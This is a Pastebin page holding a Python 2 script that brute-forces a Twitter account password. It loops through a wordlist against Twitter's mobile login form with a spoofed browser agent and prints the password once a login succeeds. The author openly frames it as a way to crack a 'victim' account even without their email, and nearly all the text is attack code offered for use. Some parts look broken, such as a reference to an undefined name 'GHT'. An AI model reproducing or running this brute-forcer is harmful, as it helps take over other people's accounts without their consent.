Advertisement
Essentricked

Twitter .py Brute Forcer -Essentricked

Nov 23rd, 2016
194
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.74 KB | None | 0 0
  1. Place proper python activation codes on here name it .py run in terminal:)
  2. My Twitta = @Essentricked
  3.  
  4.  
  5.  
  6.  
  7. import sys
  8. import random
  9. import mechanize
  10. import cookielib
  11.  
  12.  
  13. print "Note: - This tool can crack Twitter account even if you don't have the email of your victim"
  14. print "# Hit CTRL+C to quit the program"
  15.  
  16.  
  17.  
  18. username = str(raw_input("# Enter |Username| Twitter : "))
  19. passwordlist = str(raw_input("Enter the name of the password list file : "))
  20.  
  21. useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
  22.  
  23.  
  24.  
  25. login = 'https://mobile.twitter.com/session'
  26. def attack(password):
  27.  
  28. try:
  29. sys.stdout.write("\r[*] trying %s.. " % password)
  30. sys.stdout.flush()
  31. br.addheaders = [('User-agent', random.choice(useragents))]
  32. site = br.open(login)
  33. br.select_form(nr=0)
  34.  
  35.  
  36.  
  37.  
  38. ##Twitter
  39. br.form['username'] = username
  40. br.form['password'] = password
  41. br.submit()
  42. log = br.geturl()
  43. if log != login:
  44. print "\n\n\n [*] Password Twitter found .. !!"
  45. print "\n [*] Password : %s\n" % (password)
  46. sys.exit(1)
  47. except KeyboardInterrupt:
  48. print "\n[*] Exiting program .. "
  49. sys.exit(1)
  50.  
  51. def search():
  52. global password
  53. for password in passwords:
  54. attack(password.replace("\n",""))
  55.  
  56.  
  57.  
  58. def check():
  59.  
  60. global br
  61. global passwords
  62. try:
  63. br = mechanize.Browser()
  64. cj = cookielib.LWPCookieJar()
  65. br.set_handle_robots(False)
  66. br.set_handle_equiv(True)
  67. br.set_handle_referer(True)
  68. br.set_handle_redirect(True)
  69. br.set_cookiejar(cj)
  70. br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
  71. except KeyboardInterrupt:
  72. print "\n[*] Exiting program ..\n"
  73. sys.exit(1)
  74. try:
  75. list = open(passwordlist, "r")
  76. passwords = list.readlines()
  77. k = 0
  78. while k < len(passwords):
  79. passwords[k] = passwords[k].strip()
  80. k += 1
  81. except IOError:
  82. print "\n [*] Error: check your password list path \n"
  83. sys.exit(1)
  84. except KeyboardInterrupt:
  85. print "\n [*] Exiting program ..\n"
  86. sys.exit(1)
  87. try:
  88. print GHT
  89. print " [*] Account to crack : %s" % (username)
  90. print " [*] Loaded :" , len(passwords), "passwords"
  91. print " [*] Cracking, please wait ..."
  92. except KeyboardInterrupt:
  93. print "\n [*] Exiting program ..\n"
  94. sys.exit(1)
  95. try:
  96. search()
  97. attack(password)
  98. except KeyboardInterrupt:
  99. print "\n [*] Exiting program ..\n"
  100. sys.exit(1)
  101.  
  102. if __name__ == '__main__':
  103. check()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement